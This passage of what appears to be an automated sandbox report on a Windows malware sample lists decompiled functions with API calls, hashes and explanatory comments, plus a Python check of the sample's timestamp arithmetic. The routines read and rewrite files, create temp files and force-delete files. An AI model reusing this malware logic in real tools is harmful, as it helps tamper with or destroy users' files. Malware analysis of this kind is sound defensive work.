                          						SetFilePointer(_t52, 0, 0, 0);
                          						_t23 = _t41 - 1; // -1
                          						if(_t23 > 0x4ffffe) {
                          							goto L19;
                          						} else {
                          							_t34 = E005C3180(_t41, 0);
                          							_t55 = _t54 + 8;
                          							if(_t34 == 0) {
                          								goto L19;
                          							} else {
                          								_t49 = _t34;
                          								if(ReadFile(_t52, _t49, _t41, _t55, 0) == 0) {
                          									E005C91E0(_t49);
                          									goto L19;
                          								} else {
                          									CloseHandle(_t52);
                          									_push(_t53);
                          									_push(_v1044);
                          									_push(_t49);
                          									E005D1240();
                          									E005C91E0(_t49);
                          								}
                          							}
                          						}
                          					}
                          				}
                          				goto L20;
                          			}

                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 005D74C8
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005D74DA
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005D74ED
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 005D7516
                          • CloseHandle.KERNEL32(00000000), ref: 005D7521
                            • Part of subcall function 005C91E0: RtlFreeHeap.NTDLL(00000008,?,005C9F64), ref: 005C91F1
                          • CloseHandle.KERNEL32(00000000), ref: 005D754A
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: File$CloseHandlePointer$CreateFreeHeapRead
                          • String ID:
                          • API String ID: 3957287750-0
                          • Opcode ID: 213d562a62b219a09dc68f31557703bd2f2d135aa6d80a07ddeb90e056f26305
                          • Instruction ID: 173480b742ab2c3312e1b582de24a0f4df019e8be2bfc6da046fa7b0f942d515
                          • Opcode Fuzzy Hash: 213d562a62b219a09dc68f31557703bd2f2d135aa6d80a07ddeb90e056f26305
                          • Instruction Fuzzy Hash: FA3104B1108204A7D7305B28EC49FAB7AADFFC5718F64462BF64996391F7318D06C2A6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E005CFA90(short* __ecx, void* __eflags, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16) {
                          				WCHAR* _v0;
                          				WCHAR* _v8;
                          				char _v220;
                          				int _v224;
                          				short _v228;
                          				WCHAR* _v236;
                          				char _v240;
                          				signed int _v244;
                          				WCHAR* _v248;
                          				intOrPtr _v252;
                          				WCHAR* _v256;
                          				short _v260;
                          				char _v264;
                          				short* _v268;
                          				short* _v272;
                          				short* _v276;
                          				short* _v280;
                          				WCHAR* _v284;
                          				intOrPtr _v288;
                          				intOrPtr _v292;
                          				intOrPtr _t107;
                          				WCHAR* _t108;
                          				WCHAR* _t116;
                          				WCHAR* _t123;
                          				WCHAR* _t124;
                          				intOrPtr _t125;
                          				WCHAR* _t127;
                          				intOrPtr _t128;
                          				WCHAR* _t131;
                          				intOrPtr _t132;
                          				WCHAR* _t134;
                          				intOrPtr _t135;
                          				WCHAR* _t136;
                          				intOrPtr _t137;
                          				WCHAR* _t140;
                          				WCHAR* _t141;
                          				intOrPtr _t142;
                          				WCHAR* _t147;
                          				WCHAR* _t149;
                          				signed int _t152;
                          				intOrPtr _t154;
                          				signed int _t155;
                          				signed int _t159;
                          				WCHAR* _t163;
                          				WCHAR* _t164;
                          				WCHAR* _t165;
                          				WCHAR* _t167;
                          				intOrPtr _t168;
                          				intOrPtr _t169;
                          				signed int _t170;
                          				short* _t172;
                          				char* _t173;
                          				WCHAR* _t174;
                          				signed int _t178;
                          				intOrPtr _t181;
                          				signed int _t182;
                          				short* _t184;
                          				WCHAR* _t186;
                          				WCHAR* _t187;
                          				short* _t189;
                          				intOrPtr _t190;
                          				WCHAR* _t194;
                          				WCHAR* _t195;
                          				signed int _t196;
                          				short** _t200;
                          
                          				_t195 = _a8;
                          				_t189 = __ecx;
                          				E005D6610( &_v284, 0, 0x10c);
                          				_t200 =  &(( &_v280)[3]);
                          				_t107 =  *0x5d9b0c; // 0x26f2b8
                          				 *(_t107 + 8) = 6;
                          				_t4 = _t107 + 0x24; // 0x0
                          				_t168 =  *_t4;
                          				if(_t168 == 0) {
                          					L32:
                          					 *(_t107 + 8) = 2;
                          					goto L33;
                          				} else {
                          					_t152 = 0xfffffffe;
                          					_t149 = 1;
                          					while( *((short*)(_t168 + _t149 * 2 - 2)) != 0) {
                          						_t149 =  &(_t149[0]);
                          						_t152 = _t152 + 0xfffffffe;
                          						if(_t149 != 0x80000000) {
                          							continue;
                          						} else {
                          							_v252 = 0;
                          							_v248 = 0x80070057;
                          							goto L32;
                          						}
                          					}
                          					_t10 = _t149 - 1; // 0x0
                          					_t181 = _t10;
                          					_v252 = _t181;
                          					_v248 = 0;
                          					_t123 = E005C3180( ~_t152, 0);
                          					_t200 =  &(_t200[2]);
                          					_t169 =  *0x5d9b0c; // 0x26f2b8
                          					__eflags = _t123;
                          					_v284 = _t123;
                          					if(_t123 == 0) {
                          						 *(_t169 + 8) = 6;
                          						L33:
                          						if(_v220 == 0) {
                          							_t108 = _v256;
                          							__eflags = _t108;
                          							if(_t108 != 0) {
                          								E005C91E0(_t108);
                          								_t200 =  &(_t200[1]);
                          							}
                          							__eflags = _t195;
                          							if(_t195 != 0) {
                          								_t116 = _v0;
                          								__eflags = _t116;
                          								if(_t116 != 0) {
                          									DeleteFileW(_t116);
                          									E005C91E0(_v0);
                          									_t200 =  &(_t200[1]);
                          									_v0 = 0;
                          								}
                          							}
                          						} else {
                          							if(_t195 != 0) {
                          								_t120 = _v256;
                          								if(_v256 != 0) {
                          									E005C91E0(_t120);
                          									_t200 =  &(_t200[1]);
                          								}
                          							}
                          						}
                          						_t109 = _v260;
                          						if(_v260 != 0) {
                          							E005C91E0(_t109);
                          							_t200 =  &(_t200[1]);
                          						}
                          						_t110 = _v284;
                          						if(_v284 != 0) {
                          							E005C91E0(_t110);
                          							_t200 =  &(_t200[1]);
                          						}
                          						_t111 = _v276;
                          						if(_v276 != 0) {
                          							E005C91E0(_t111);
                          						}
                          						return _v220;
                          					}
                          					__eflags = _t149;
                          					if(__eflags <= 0) {
                          						_t154 = 0x80070057;
                          						if(__eflags != 0) {
                          							 *_t123 = 0;
                          						}
                          						L16:
                          						_v248 = _t154;
                          						 *(_t169 + 8) = 2;
                          						goto L33;
                          					} else {
                          						 *_t200 = _t189;
                          						_t14 = _t169 + 0x24; // 0x0
                          						_t190 =  *_t14;
                          						_v288 = _t181;
                          						_v292 = _t169;
                          						_t182 = 2;
                          						_t170 = 0;
                          						_t155 = 0;
                          						__eflags = 0;
                          						while(1) {
                          							_t196 =  *(_t190 + _t155 * 2) & 0x0000ffff;
                          							__eflags = _t196;
                          							if(_t196 == 0) {
                          								break;
                          							}
                          							_t123[_t155] = _t196;
                          							_t182 = _t182 + 0xfffffffe;
                          							_t170 = _t170 + 0xfffffffe;
                          							__eflags = _t149 - 1;
                          							_t149 = _t149 - 1;
                          							if(__eflags == 0) {
                          								L11:
                          								__eflags = _t149;
                          								_t180 =  ==  ?  ~_t182 :  ~_t170;
                          								 *((short*)(_t123 + ( ==  ?  ~_t182 :  ~_t170))) = 0;
                          								if(_t149 != 0) {
                          									L18:
                          									 *((intOrPtr*)( &_v240 - 8)) = 0;
                          									_t184 =  &(( *_t200)[6]);
                          									_t124 = E005D08A0(_t123, _t123, _v288,  &_v276,  &_v240);
                          									_t195 = _v8;
                          									__eflags = _t124;
                          									if(_t124 == 0) {
                          										L31:
                          										_t107 =  *0x5d9b0c; // 0x26f2b8
                          										goto L32;
                          									}
                          									_t125 = _v240;
                          									__eflags = _t125 - 0x23;
                          									if(_t125 <= 0x23) {
                          										goto L31;
                          									}
                          									_t172 = _v276;
                          									 *_t200 = _t184;
                          									_v228 =  *_t172;
                          									_v268 =  &(_t172[2]);
                          									_t159 = _t172[0x12];
                          									_v244 = _t159;
                          									_v280 =  &(_t172[0x14]);
                          									_t193 = _t172 + 0x28 + _t159 * 2;
                          									_t186 = _t125 - 0x28 - _t159 + _t159;
                          									__eflags = _t159;
                          									_v264 = _t172 + 0x28 + _t159 * 2;
                          									_v236 = _t186;
                          									_v272 = _t172;
                          									if(_t159 == 0) {
                          										goto L31;
                          									}
                          									__eflags = _t186;
                          									if(_t186 == 0) {
                          										goto L31;
                          									}
                          									_push(_t186);
                          									_t127 = E005CB250(_t172, _t125 - _t186, _t193);
                          									__eflags = _t127;
                          									if(_t127 == 0) {
                          										_t128 =  *0x5d9b0c; // 0x26f2b8
                          										 *((intOrPtr*)(_t128 + 8)) = 3;
                          										goto L33;
                          									}
                          									_t187 = _a12;
                          									__eflags = _t195;
                          									 *_v268 = 0;
                          									if(__eflags == 0) {
                          										L66:
                          										_push(0xc);
                          										_push( &_v228);
                          										_t131 = E005CDCF0(__eflags,  *((intOrPtr*)( &_v260 - 0x18)),  &_v260);
                          										_t200 =  &(_t200[4]);
                          										__eflags = _t131;
                          										if(_t131 == 0) {
                          											_t132 =  *0x5d9b0c; // 0x26f2b8
                          											 *((intOrPtr*)(_t132 + 8)) = 4;
                          											goto L33;
                          										}
                          										_t173 =  &_v264;
                          										_push(0x800c);
                          										_push( &_v236);
                          										_push(_t173);
                          										_push( *((intOrPtr*)(_t173 + 0x24)));
                          										_push( *((intOrPtr*)(_t173 + 4)));
                          										_t134 = E005CF800();
                          										__eflags = _t134;
                          										if(_t134 == 0) {
                          											L70:
                          											_t135 =  *0x5d9b0c; // 0x26f2b8
                          											 *((intOrPtr*)(_t135 + 8)) = 5;
                          											goto L33;
                          										}
                          										__eflags = _v236 - 0x20;
                          										if(_v236 != 0x20) {
                          											goto L70;
                          										}
                          										_t136 = E005D7D20(_v264, _v272, 0x20);
                          										_t200 =  &(_t200[3]);
                          										__eflags = _t136;
                          										if(_t136 == 0) {
                          											__eflags = _t195;
                          											if(_t195 == 0) {
                          												_t163 = _a8;
                          												__eflags = _t163;
                          												if(_t163 == 0) {
                          													L79:
                          													__eflags = _v224;
                          													if(_v224 != 0) {
                          														_t137 =  *0x5d9b0c; // 0x26f2b8
                          														 *(_t137 + 8) = 1;
                          													}
                          													goto L33;
                          												}
                          												__eflags = _t187;
                          												 *_t163 = _v260;
                          												if(_t187 == 0) {
                          													goto L79;
                          												}
                          												 *_t187 = _v228;
                          												L78:
                          												_v224 = 1;
                          												goto L79;
                          											}
                          											_t140 = E005C6270(_t136, _v0, _v260, _v228);
                          											_t200 =  &(_t200[3]);
                          											__eflags = _t140;
                          											if(_t140 != 0) {
                          												goto L78;
                          											}
                          											goto L33;
                          										}
                          										goto L70;
                          									}
                          									_t141 = E005C3180(0x20a, 0);
                          									_t200 =  &(_t200[2]);
                          									__eflags = _t141;
                          									_v0 = _t141;
                          									if(_t141 == 0) {
                          										_t142 =  *0x5d9b0c; // 0x26f2b8
                          										 *(_t142 + 8) = 6;
                          										goto L33;
                          									}
                          									__eflags = _v0;
                          									if(_v0 == 0) {
                          										L30:
                          										GetTempPathW(0x104, _t141);
                          										_t194 =  &_v220;
                          										E005D4520(_t194, 0x7c);
                          										_t200 =  &(_t200[2]);
                          										GetTempFileNameW(_v0, _t194, 1, _v0);
                          										_t141 = _v0;
                          										L52:
                          										_t174 = 0;
                          										__eflags = 0;
                          										_t164 = _t141;
                          										while(1) {
                          											__eflags =  *_t164;
                          											if( *_t164 == 0) {
                          												break;
                          											}
                          											_t174 = _t174 + 1;
                          											_t164 =  &(_t164[1]);
                          											__eflags = _t174 - 0x103;
                          											if(_t174 <= 0x103) {
                          												continue;
                          											}
                          											break;
                          										}
                          										__eflags = _t164 - _t141;
                          										if(__eflags <= 0) {
                          											goto L66;
                          										}
                          										_t165 =  &(_t164[2]);
                          										__eflags = _t165;
                          										while(1) {
                          											__eflags = ( *(_t165 - 4) & 0x0000ffff) - 0x2e;
                          											if(( *(_t165 - 4) & 0x0000ffff) == 0x2e) {
                          												break;
                          											}
                          											_t79 = _t165 - 2; // -8
                          											__eflags =  &(_t165[0xfffffffffffffffd]) - _t141;
                          											_t165 = _t79;
                          											if(__eflags > 0) {
                          												continue;
                          											}
                          											goto L66;
                          										}
                          										_t147 = _a16;
                          										__eflags = _t147;
                          										if(__eflags == 0) {
                          											 *(_t165 - 2) = 0x780065;
                          											_t165[1] = 0x65;
                          											_t165 =  &(_t165[1]);
                          										} else {
                          											__eflags = _t147 - 1;
                          											if(__eflags != 0) {
                          												_t165 =  &(_t165[0xffffffffffffffff]);
                          												__eflags = _t165;
                          											} else {
                          												 *(_t165 - 2) = 0x73006a;
                          											}
                          										}
                          										_t165[1] = 0;
                          										goto L66;
                          									}
                          									_t167 = 0xfffffdf8;
                          									while(1) {
                          										_t178 =  *(_v0 +  &(_t167[0x104])) & 0x0000ffff;
                          										__eflags = _t178;
                          										if(_t178 == 0) {
                          											break;
                          										}
                          										 *(_t141 +  &(_t167[0x104])) = _t178;
                          										_t167 =  &(_t167[1]);
                          										__eflags = _t167;
                          										if(_t167 != 0) {
                          											continue;
                          										}
                          										 *((short*)(_t141 +  &(_t167[0x103]))) = 0;
                          										_v252 = 0x8007007a;
                          										goto L30;
                          									}
                          									 *(_t141 +  &(_t167[0x104])) = 0;
                          									_v252 = 0;
                          									goto L52;
                          								} else {
                          									_t195 = _a8;
                          									_t169 = _v292;
                          									_t154 = 0x8007007a;
                          									goto L16;
                          								}
                          							}
                          							__eflags = _t155 - 0x7ffffffd;
                          							_t155 = _t155 + 1;
                          							if(__eflags != 0) {
                          								continue;
                          							}
                          							goto L11;
                          						}
                          						_t123[_t155] = 0;
                          						goto L18;
                          					}
                          				}
                          			}
                          0x005cfe67
                          0x005cfe6c
                          0x005cfe6d
                          0x005cfe6e
                          0x005cfe71
                          0x005cfe74
                          0x005cfe79
                          0x005cfe7b
                          0x005cfe9a
                          0x005cfe9a
                          0x005cfe9f
                          0x00000000
                          0x005cfe9f
                          0x005cfe7d
                          0x005cfe82
                          0x00000000
                          0x00000000
                          0x005cfe8e
                          0x005cfe93
                          0x005cfe96
                          0x005cfe98
                          0x005cfebc
                          0x005cfebe
                          0x005cfedc
                          0x005cfee3
                          0x005cfee5
                          0x005cfeff
                          0x005cfeff
                          0x005cff04
                          0x005cff0a
                          0x005cff0f
                          0x005cff0f
                          0x00000000
                          0x005cff04
                          0x005cfeeb
                          0x005cfeed
                          0x005cfeef
                          0x00000000
                          0x00000000
                          0x005cfef5
                          0x005cfef7
                          0x005cfef7
                          0x00000000
                          0x005cfef7
                          0x005cfecb
                          0x005cfed0
                          0x005cfed3
                          0x005cfed5
                          0x00000000
                          0x00000000
                          0x00000000
                          0x005cfed7
                          0x00000000
                          0x005cfe98
                          0x005cfc78
                          0x005cfc7d
                          0x005cfc80
                          0x005cfc82
                          0x005cfc85
                          0x005cfdb6
                          0x005cfdbb
                          0x00000000
                          0x005cfdbb
                          0x005cfc8b
                          0x005cfc93
                          0x005cfcd1
                          0x005cfcd7
                          0x005cfcdd
                          0x005cfce4
                          0x005cfce9
                          0x005cfcf4
                          0x005cfcfa
                          0x005cfdd9
                          0x005cfdd9
                          0x005cfdd9
                          0x005cfddb
                          0x005cfddd
                          0x005cfddd
                          0x005cfde1
                          0x00000000
                          0x00000000
                          0x005cfde3
                          0x005cfde4
                          0x005cfde7
                          0x005cfded
                          0x00000000
                          0x00000000
                          0x00000000
                          0x005cfded
                          0x005cfdef
                          0x005cfdf1
                          0x00000000
                          0x00000000
                          0x005cfdf3
                          0x005cfdf3
                          0x005cfdf6
                          0x005cfdfa
                          0x005cfdfd
                          0x00000000
                          0x00000000
                          0x005cfdff
                          0x005cfe05
                          0x005cfe07
                          0x005cfe09
                          0x00000000
                          0x00000000
                          0x00000000
                          0x005cfe0b
                          0x005cfe0d
                          0x005cfe14
                          0x005cfe16
                          0x005cfe26
                          0x005cfe2d
                          0x005cfe33
                          0x005cfe18
                          0x005cfe18
                          0x005cfe1b
                          0x005cfe38
                          0x005cfe38
                          0x005cfe1d
                          0x005cfe1d
                          0x005cfe1d
                          0x005cfe1b
                          0x005cfe3b
                          0x00000000
                          0x005cfe3b
                          0x005cfc95
                          0x005cfc9a
                          0x005cfca1
                          0x005cfca9
                          0x005cfcac
                          0x00000000
                          0x00000000
                          0x005cfcb2
                          0x005cfcba
                          0x005cfcba
                          0x005cfcbd
                          0x00000000
                          0x00000000
                          0x005cfcbf
                          0x005cfcc9
                          0x00000000
                          0x005cfcc9
                          0x005cfdc7
                          0x005cfdd1
                          0x00000000
                          0x005cfb7a
                          0x005cfb7a
                          0x005cfb81
                          0x005cfb85
                          0x00000000
                          0x005cfb85
                          0x005cfb78
                          0x005cfb5e
                          0x005cfb64
                          0x005cfb67
                          0x00000000
                          0x00000000
                          0x00000000
                          0x005cfb67
                          0x005cfbb4
                          0x00000000
                          0x005cfbb4
                          0x005cfb28

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: DeleteFile
                          • String ID: $z
                          • API String ID: 4033686569-2251613814
                          • Opcode ID: a3ec109eb1490a8ad0a94946fbb33afb63550ed932dfef39ac819158147d5a79
                          • Instruction ID: e57dcb60bd1225bc1fae1a69241ec99cc1398857c7bb2b515bb48763bbf3f76d
                          • Opcode Fuzzy Hash: a3ec109eb1490a8ad0a94946fbb33afb63550ed932dfef39ac819158147d5a79
                          • Instruction Fuzzy Hash: F5C181B06043019FDB20DF94D849F6ABBE6FF84304F19892EE94A8B2A1D775D944CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			// Reads a whole file (size 1 .. 0xFFFFF bytes) into a heap buffer and hands the
                          			// buffer to E005CB9F0, which in turn opens a file with GENERIC_READ|GENERIC_WRITE
                          			// and CREATE_ALWAYS (see the APIs list below), i.e. a read-then-rewrite routine.
                          			// Comments are editorial; _t26[...] stack-slot names are decompiler output.
                          			E005CC510(void* __eax, void* __ecx) {
                          				void* _t7;
                          				long _t9;
                          				void* _t13;
                          				void* _t22;
                          				long _t23;
                          				long _t25;
                          				DWORD* _t26;
                          
                          				_t23 = 0;
                          				 *_t26 = 0;
                          				// CreateFileW(path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)
                          				_t7 = CreateFileW(_t26[6], 0x80000000, 1, 0, 3, 0x80, 0);
                          				if(_t7 != 0xffffffff) {  // INVALID_HANDLE_VALUE
                          					_t22 = _t7;
                          					_t23 = 0;
                          					_t9 = SetFilePointer(_t7, 0, 0, 2);  // FILE_END: the returned offset is the file size
                          					if(_t9 == 0xffffffff) {  // INVALID_SET_FILE_POINTER
                          						L7:
                          						CloseHandle(_t22);
                          					} else {
                          						_t25 = _t9;
                          						SetFilePointer(_t22, 0, 0, 0);  // FILE_BEGIN: rewind before reading
                          						_t2 = _t25 - 1; // -1
                          						if(_t2 > 0xffffe) {  // size cap: at most 0xFFFFF bytes are accepted
                          							goto L7;
                          						} else {
                          							_t13 = E005C3180(_t25, 0);  // heap allocation (GetProcessHeap + RtlReAllocateHeap wrapper)
                          							_t26 =  &(_t26[2]);
                          							if(_t13 == 0) {
                          								goto L7;
                          							} else {
                          								_t20 = _t13;
                          								if(ReadFile(_t22, _t13, _t25, _t26, 0) == 0) {  // single read of the whole file
                          									E005C91E0(_t20);  // RtlFreeHeap wrapper
                          									_t26 =  &(_t26[1]);
                          									goto L7;
                          								} else {
                          									CloseHandle(_t22);
                          									// consumer of the buffer; its return value is this function's result
                          									_t23 = E005CB9F0(_t20, _t26[1], _t26[7]);
                          									E005C91E0(_t20);  // free the buffer
                          									_t26 =  &(_t26[4]);
                          								}
                          							}
                          						}
                          					}
                          				}
                          				return _t23;
                          			}










                          (Instruction address column for the listing above: one address per source line, 0x005cc519 to 0x005cc5ca; 0x00000000 marks lines that map to no instruction.)

                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 005CC52F
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005CC547
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005CC558
                            • Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
                            • Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 005CC581
                          • CloseHandle.KERNEL32(00000000), ref: 005CC590
                            • Part of subcall function 005CB9F0: CreateFileW.KERNEL32(C0000000,00000001,00000000,00000002,00000080,00000000), ref: 005CBA3B
                            • Part of subcall function 005C91E0: RtlFreeHeap.NTDLL(00000008,?,005C9F64), ref: 005C91F1
                          • CloseHandle.KERNEL32(00000000), ref: 005CC5BB
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: File$Heap$CloseCreateHandlePointer$AllocateFreeProcessRead
                          • String ID:
                          • API String ID: 739418787-0
                          • Opcode ID: e7035eab733dd50cefc89cf8c8ff7db3d6c3c4547ed53a5364e638747dbd24ad
                          • Instruction ID: 63519dcb395aada45f22b2646d3e77cd836e76b9bc6915c731850c30826a8fea
                          • Opcode Fuzzy Hash: e7035eab733dd50cefc89cf8c8ff7db3d6c3c4547ed53a5364e638747dbd24ad
                          • Instruction Fuzzy Hash: 2C11BF715011147FE6302AA56C8EFAB3F9CEF827B5F14052AF90ED2291E661AD09D2E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 37%
                          			// Opens a file read-only, reads its three FILETIMEs with GetFileTime and returns
                          			// each one through the optional out-pointers _a8/_a12/_a16 as a 32-bit Unix
                          			// timestamp. *0x5d9ee4 is the imported _aulldiv (APIs below): the 64-bit FILETIME
                          			// (100 ns ticks since 1601-01-01) is divided by 0x989680 (10,000,000) to give
                          			// seconds since 1601, then 0x49ef6f00 is added. 0x49ef6f00 == -11644473600 mod 2^32,
                          			// the 1601-to-1970 offset, so the sum is seconds since 1970 truncated to 32 bits.
                          			// The decompiler's labels for the three FILETIME stack slots are inconsistent
                          			// (note the third conversion reading _v36/_v32); the calls are in GetFileTime's
                          			// order: creation, last access, last write. Comments are editorial.
                          			E005D0230(WCHAR* _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16) {
                          				struct _FILETIME _v20;
                          				struct _FILETIME _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				void* _t13;
                          				intOrPtr* _t24;
                          				intOrPtr* _t25;
                          				struct _SECURITY_ATTRIBUTES* _t28;
                          				intOrPtr* _t29;
                          				void* _t31;
                          
                          				_t28 = 0;
                          				// CreateFileW(path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL)
                          				_t13 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0);
                          				if(_t13 != 0xffffffff) {  // INVALID_HANDLE_VALUE
                          					_t31 = _t13;
                          					if(GetFileTime(_t31,  &_v20,  &_v28,  &(_v28.dwHighDateTime)) == 0) {
                          						_t28 = 0;
                          					} else {
                          						_t24 = _a8;
                          						_t29 = _a12;
                          						if(_t24 != 0) {  // creation time -> *_a8
                          							 *_t24 =  *0x5d9ee4(_v20.dwLowDateTime, _v20.dwHighDateTime, 0x989680, 0) + 0x49ef6f00;
                          						}
                          						_t25 = _a16;
                          						if(_t29 != 0) {  // last access time -> *_a12
                          							 *_t29 =  *0x5d9ee4(_v28.dwLowDateTime, _v28.dwHighDateTime.dwLowDateTime, 0x989680, 0) + 0x49ef6f00;
                          						}
                          						_t28 = 1;
                          						if(_t25 != 0) {  // last write time -> *_a16
                          							 *_t25 =  *0x5d9ee4(_v36, _v32, 0x989680, 0) + 0x49ef6f00;
                          						}
                          					}
                          					CloseHandle(_t31);
                          				}
                          				return _t28;  // 1 if the times were read, 0 otherwise
                          			}













                          (Instruction address column for the listing above: one address per source line, 0x005d0236 to 0x005d02f3; 0x00000000 marks lines that map to no instruction.)

                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005D0248
                          • GetFileTime.KERNEL32(00000000,?,?,?,?,?,005D0385,00000000), ref: 005D0267
                          • _aulldiv.NTDLL(?,?,00989680,00000000), ref: 005D028C
                          • _aulldiv.NTDLL(?,?,00989680,00000000), ref: 005D02B0
                          • _aulldiv.NTDLL(?,?,00989680,00000000), ref: 005D02D3
                          • CloseHandle.KERNEL32(00000000), ref: 005D02E5
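                          The FILETIME arithmetic in E005D0230 is easy to misread because the epoch offset never appears as a recognisable constant. The following is an added example (not Joe Sandbox output and not code from the sample) that re-implements the decompiled arithmetic in Python so the 0x49ef6f00 constant can be checked against a full-width reference conversion. The input timestamp is constructed (2019-10-21 00:00:00 UTC, the date in the sample's file name); the function and constant names are this example's own.

```python
"""FILETIME -> Unix-epoch conversion as performed by E005D0230 (added example)."""

TICKS_PER_SECOND = 0x989680           # 10,000,000: the divisor passed to _aulldiv
EPOCH_DELTA_SECONDS = 11_644_473_600  # seconds between 1601-01-01 and 1970-01-01
SAMPLE_ADDEND = 0x49EF6F00            # constant the function adds after the division
MASK32 = 0xFFFFFFFF


def from_dwords(low: int, high: int) -> int:
    """Assemble a 64-bit FILETIME from the (dwLowDateTime, dwHighDateTime) pair
    that E005D0230 passes to _aulldiv."""
    return ((high & MASK32) << 32) | (low & MASK32)


def filetime_to_unix_as_sample(low: int, high: int) -> int:
    """What the decompiled code computes: _aulldiv(low, high, 0x989680, 0) + 0x49ef6f00,
    held in a 32-bit register (hence the mask)."""
    seconds_since_1601 = from_dwords(low, high) // TICKS_PER_SECOND
    return (seconds_since_1601 + SAMPLE_ADDEND) & MASK32


def filetime_to_unix_reference(filetime: int) -> int:
    """Full-width reference conversion with no 32-bit truncation."""
    return filetime // TICKS_PER_SECOND - EPOCH_DELTA_SECONDS


def addend_is_negated_epoch_delta() -> bool:
    """0x49EF6F00 == (-11644473600) mod 2**32: adding it is the 32-bit way of
    subtracting the 1601->1970 offset, which does not fit in 32 bits itself."""
    return SAMPLE_ADDEND == (-EPOCH_DELTA_SECONDS) & MASK32


def unix_to_filetime(unix_seconds: int) -> int:
    return (unix_seconds + EPOCH_DELTA_SECONDS) * TICKS_PER_SECOND


def results_agree(unix_seconds: int) -> bool:
    """The truncated result equals the reference only while the reference value
    fits in an unsigned 32-bit integer (timestamps up to 2106-02-07)."""
    ft = unix_to_filetime(unix_seconds)
    return filetime_to_unix_as_sample(ft & MASK32, ft >> 32) == filetime_to_unix_reference(ft)


# Constructed input: 2019-10-21 00:00:00 UTC.
SAMPLE_UNIX = 1_571_616_000
SAMPLE_FILETIME = unix_to_filetime(SAMPLE_UNIX)

if __name__ == "__main__":
    low, high = SAMPLE_FILETIME & MASK32, SAMPLE_FILETIME >> 32
    print(hex(SAMPLE_FILETIME), filetime_to_unix_as_sample(low, high))
```

The practical consequence for an analyst is that any 32-bit value the sample derives from these timestamps (for example in a bot ID or beacon) is plain Unix time and can be decoded as such.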
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: _aulldiv$File$CloseCreateHandleTime
                          • String ID:
                          • API String ID: 504125806-0
                          • Opcode ID: a925d464e29bba63017a4f287cfd0f0ff31f663b7e1e95925a49861b58adfcc0
                          • Instruction ID: 5d30b7e8c765c7eaa509aee61c8a9cd47f8d2d2064dffa2b4f5f9a251ddb9209
                          • Opcode Fuzzy Hash: a925d464e29bba63017a4f287cfd0f0ff31f663b7e1e95925a49861b58adfcc0
                          • Instruction Fuzzy Hash: AB119A32201341BBD7209F28DC49F5B7BAAFFC4B08F14491BF695A62A4D6708C15DB56
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			// Copies a path obtained from E005CB7A0(*0x5d9c40) (a heap buffer, freed with
                          			// E005C91E0 on every exit) into a stack buffer, replaces its extension with the
                          			// string produced by E005D4520(..., 0x69), and deletes the resulting file unless
                          			// it is a directory. DeleteFileW is retried up to five times one second apart,
                          			// with the attributes reset to FILE_ATTRIBUTE_NORMAL (0x80) between attempts so
                          			// read-only/hidden/system flags cannot block the delete. Note that
                          			// GetFileAttributesW returns 0xffffffff for a missing file, which has bit 0x10
